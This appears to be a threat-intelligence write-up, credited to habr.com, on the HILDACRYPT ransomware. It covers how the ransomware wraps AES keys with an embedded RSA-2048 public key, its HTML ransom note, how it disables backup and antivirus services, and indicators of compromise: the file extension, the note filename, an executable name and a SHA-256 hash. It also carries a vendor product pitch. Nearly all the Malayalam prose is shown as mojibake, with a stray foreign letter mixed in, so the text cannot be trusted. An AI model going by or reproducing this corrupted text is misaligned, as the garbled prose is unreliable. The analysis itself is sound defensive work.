AES, IV เดเต เดเตปเดเตเดฐเดฟเดชเตเดทเตป RSA-2048 เดเดชเดฏเตเดเดฟเดเตเดเดพเดฃเต เดเตเดฏเตเดฏเตเดจเตเดจเดคเต, เดเตเดเดพเดคเต Base64 เดเดชเดฏเตเดเดฟเดเตเดเดพเดฃเต เดเตปเดเตเดกเดฟเดเดเต เดเตเดฏเตเดฏเตเดจเตเดจเดคเต. XML เดซเตเตผเดฎเดพเดฑเตเดฑเดฟเตฝ เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดค เดธเตเดเตเดฐเดฟเดเดเตเดเดณเดฟเดฒเตเดจเตเดจเดฟเตฝ เดเตเดฐเดฟเดชเตโเดฑเตเดฑเตเดฒเตเดเตเดเดฑเดฟเดจเตเดฑเต เดฌเตเดกเดฟเดฏเดฟเตฝ RSA เดชเดฌเตเดฒเดฟเดเต เดเต เดธเดเดญเดฐเดฟเดเตเดเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
AES เดซเดฏเตฝ เดเต เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดฏเดพเตป เดเดฐเต RSA เดชเดฌเตเดฒเดฟเดเต เดเต เดเดชเดฏเตเดเดฟเดเตเดเตเดจเตเดจเต. RSA เดชเดฌเตเดฒเดฟเดเต เดเต Base64 เดเตปเดเตเดกเต เดเตเดฏเตโเดคเดคเดพเดฃเต, เด เดคเดฟเตฝ เดเดฐเต เดฎเตเดกเตเดฒเดธเตเด 65537 เดเดจเตเดจ เดชเดฌเตเดฒเดฟเดเต เดเดเตโเดธเตโเดชเตเดฃเดจเตเดฑเตเด เด เดเดเตเดเดฟเดฏเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต. เดกเตเดเตเดฐเดฟเดชเตเดฑเตเดฑเดฟเดจเต เดเดเตเดฐเดฎเดฃเดเดพเดฐเดฟเดฏเตเดเต เดเตเดตเดถเดฎเตเดณเตเดณ RSA เดชเตเดฐเตเดตเดฑเตเดฑเต เดเต เดเดตเดถเตเดฏเดฎเดพเดฃเต.
RSA เดเตปเดเตเดฐเดฟเดชเตเดทเดจเตเดถเตเดทเด, เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดค เดซเดฏเดฒเดฟเตฝ เดธเดเดญเดฐเดฟเดเตเดเดฟเดฐเดฟเดเตเดเตเดจเตเดจ Base64 เดเดชเดฏเตเดเดฟเดเตเดเต AES เดเต เดเตปเดเตเดกเต เดเตเดฏเตเดฏเดชเตเดชเตเดเตเดจเตเดจเต.
เดฎเตเดเดจเดฆเตเดฐเดตเตเดฏ เดธเดจเตเดฆเตเดถเด
เดเตปเดเตเดฐเดฟเดชเตเดทเตป เดชเตเตผเดคเตเดคเดฟเดฏเดพเดฏเดฟเดเตเดเดดเดฟเดเตเดเดพเตฝ, HILDACRYPT เดซเดฏเดฒเตเดเตพ เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดค เดซเตเตพเดกเดฑเดฟเดฒเตเดเตเดเต html เดซเดฏเตฝ เดเดดเตเดคเตเดจเตเดจเต. ransomware เด เดฑเดฟเดฏเดฟเดชเตเดชเดฟเตฝ เดเดฐเดฏเตเดเตเดเต เดเดเตเดฐเดฎเดฃเดเดพเดฐเดฟเดฏเตเดฎเดพเดฏเดฟ เดฌเดจเตเดงเดชเตเดชเตเดเดพเตป เดเดดเดฟเดฏเตเดจเตเดจ เดฐเดฃเตเดเต เดเดฎเตเดฏเดฟเตฝ เดตเดฟเดฒเดพเดธเดเตเดเตพ เด เดเดเตเดเดฟเดฏเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต.
- [เดเดฎเตเดฏเดฟเตฝ เดชเดฐเดฟเดฐเดเตเดทเดฟเดเตเดเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต]
[เดเดฎเตเดฏเดฟเตฝ เดชเดฐเดฟเดฐเดเตเดทเดฟเดเตเดเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต]
เดคเดเตเดเดฟเดเตเดเตเดฃเตเดเตเดชเตเดเตฝ เดจเตเดเตเดเตเดธเดฟเตฝ โเดฒเตเดฒเดฟ เดธเตเดฐเดเตเดทเดฟเดคเดฎเดฒเตเดฒ;)โ เดเดจเตเดจ เดตเดฐเดฟเดฏเตเด เด
เดเดเตเดเดฟเดฏเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต - เดเดชเตเดชเดพเดจเดฟเตฝ เดจเดฟเดฐเตเดงเดฟเดเตเดเดฟเดฐเดฟเดเตเดเตเดจเตเดจ เดเตเดเตเดเต เดชเตเตบเดเตเดเตเดเดฟเดเดณเตเดเต เดฐเตเดชเดคเตเดคเดฟเดฒเตเดณเตเดณ เดเดจเดฟเดฎเตเดทเตป, เดฎเดพเดเด เดเดฅเดพเดชเดพเดคเตเดฐเดเตเดเดณเตเดเตเดเตเดฑเดฟเดเตเดเตเดณเตเดณ เดเดฐเต เดชเดฐเดพเดฎเตผเดถเด.
เดคเตเดฐเตเดฎเดพเดจเด
ransomware-เดจเตเดฑเต เดชเตเดคเดฟเดฏ เดเตเดเตเดเดฌเดฎเดพเดฏ HILDACRYPT เดเดฐเต เดชเตเดคเดฟเดฏ เดชเดคเดฟเดชเตเดชเต เดชเตเดฑเดคเตเดคเดฟเดฑเดเตเดเดฟ. ransomware เดเตปเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดค เดซเดฏเดฒเตเดเตพ เดกเตเดเตเดฐเดฟเดชเตเดฑเตเดฑเต เดเตเดฏเตเดฏเตเดจเตเดจเดคเดฟเตฝ เดจเดฟเดจเตเดจเต เดเตปเดเตเดฐเดฟเดชเตเดทเตป เดฎเตเดกเตฝ เดเดฐเดฏเต เดคเดเดฏเตเดจเตเดจเต. เดฌเดพเดเตเดเดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเดเตเดเดณเตเดฎเดพเดฏเตเด เดเตปเดฑเดฟเดตเตเดฑเดธเต เดธเตเดฒเตเดฏเตเดทเดจเตเดเดณเตเดฎเดพเดฏเตเด เดฌเดจเตเดงเดชเตเดชเตเดเตเด เดธเดเดฐเดเตเดทเดฃ เดธเตเดตเดจเดเตเดเตพ เดชเตเดฐเดตเตผเดคเตเดคเดจเดฐเดนเดฟเดคเดฎเดพเดเตเดเดพเตป เดเตเดฐเดฟเดชเตโเดฑเตเดฑเตเดฒเตเดเตเดเตผ เดธเดเตเดต เดธเดเดฐเดเตเดทเดฃ เดฐเตเดคเดฟเดเตพ เดเดชเดฏเตเดเดฟเดเตเดเตเดจเตเดจเต. HILDACRYPT-เดจเตเดฑเต เดฐเดเดฏเดฟเดคเดพเดตเต Netflix-เตฝ เดเดพเดฃเดฟเดเตเดเดฟเดฐเดฟเดเตเดเตเดจเตเดจ เดนเดฟเตฝเดก เดเดจเตเดจ เดเดจเดฟเดฎเตเดฑเตเดฑเดกเต เดธเตเดฐเตเดธเดฟเดจเตเดฑเต เดเดฐเดพเดงเดเดจเดพเดฃเต, เด เดคเดฟเดจเตเดฑเต เดเตเดฐเตเดฏเดฟเดฒเดฑเดฟเดฒเตเดเตเดเตเดณเตเดณ เดฒเดฟเดเตเดเต เดชเตเดฐเตเดเตเดฐเดพเดฎเดฟเดจเตเดฑเต เดฎเตเตป เดชเดคเดฟเดชเตเดชเดฟเดจเตเดฑเต เดตเดพเดเตเดเตฝ เดเดคเตเดคเดฟเตฝ เด เดเดเตเดเดฟเดฏเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต.
เดชเดคเดฟเดตเต เดชเตเดพเดฒเต, ะธ HILDACRYPT ransomware-เตฝ เดจเดฟเดจเตเดจเต เดจเดฟเดเตเดเดณเตเดเต เดเดฎเตเดชเตเดฏเตเดเตเดเดฑเดฟเดจเต เดธเดเดฐเดเตเดทเดฟเดเตเดเดพเตป เดเดดเดฟเดฏเตเด, เดเตเดเดพเดคเต เดฆเดพเดคเดพเดเตเดเตพเดเตเดเต เด เดตเดฐเตเดเต เดเดชเดญเตเดเตเดคเดพเดเตเดเดณเต เดธเดเดฐเดเตเดทเดฟเดเตเดเดพเดจเตเดณเตเดณ เดเดดเดฟเดตเตเดฃเตเดเต . เด เดชเดฐเดฟเดนเดพเดฐเดเตเดเตพ เดเตพเดชเตเดชเตเดเตเดจเตเดจ เดตเดธเตเดคเตเดคเดฏเดพเตฝ เดธเดเดฐเดเตเดทเดฃเด เดเดฑเดชเตเดชเดพเดเตเดเดชเตเดชเตเดเตเดจเตเดจเต เดฌเดพเดเตเดเดชเตเดชเต เดฎเดพเดคเตเดฐเดฎเดฒเตเดฒ, เดเดเตเดเดณเตเดเต เดธเดเดฏเตเดเดฟเดค เดธเตเดฐเดเตเดทเดพ เดธเดเดตเดฟเดงเดพเดจเดตเตเด เดเตพเดชเตเดชเตเดเตเดจเตเดจเต - เดเดฐเต เดฎเตเดทเตเตป เดฒเตเดฃเดฟเดเดเต เดฎเตเดกเตฝ, เดฌเดฟเดนเตเดตเดฟเดฏเดฑเตฝ เดนเตเดฏเตเดฑเดฟเดธเตเดฑเตเดฑเดฟเดเตเดธเต เด เดเดฟเดธเตเดฅเดพเดจเดฎเดพเดเตเดเดฟเดฏเตเดณเตเดณ, เดธเตเดฑเต-เดกเต ransomware เดเดจเตเดจ เดญเตเดทเดฃเดฟเดฏเต เดฎเดฑเตเดฑเตเดคเต เดชเตเดฒเต เดจเตเดฐเดฟเดเดพเตป เดเดดเดฟเดตเตเดณเตเดณ เดเดฐเต เดธเดพเดเตเดเตเดคเดฟเดเดตเดฟเดฆเตเดฏ.
เดตเดฟเดเตเดเตเดตเตเดดเตเดเดฏเตเดเต เดธเตเดเดเดเตเดเตพ
เดซเดฏเตฝ เดตเดฟเดชเตเดฒเตเดเดฐเดฃเด HCY!
HILDACRYPTReadMe.html
xamp.exe เดเดจเตเดจเดคเดฟเตฝ "p" เดเดจเตเดจ เดเดฑเตเดฑ เด
เดเตเดทเดฐเดตเตเด เดกเดฟเดเดฟเดฑเตเดฑเตฝ เดเดชเตเดชเต เดเดฒเตเดฒ
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
เด
เดตเดฒเดเดฌเด: www.habr.com